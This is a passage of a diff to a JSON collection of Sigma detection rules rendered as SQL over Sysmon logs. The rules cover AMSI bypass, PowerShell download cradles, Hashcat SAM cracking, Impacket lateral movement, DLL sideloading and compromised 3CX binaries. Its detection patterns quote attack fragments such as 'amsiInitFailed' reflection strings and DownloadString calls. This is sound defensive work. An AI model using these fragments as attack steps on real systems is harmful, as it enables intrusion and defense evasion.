'%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Other DLLs with the same Imphash" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" - ], - "filename": "image_load_hktl_sharpevtmute.yml" - }, - { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "False positive are expected with legitimate sources" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unknown" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", + "attack.t1047", "attack.lateral_movement", - "attack.t1072" + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", + "description": "Detects creation of a scheduled task with a GUID like name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Legitimate software naming their tasks as GUIDs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE 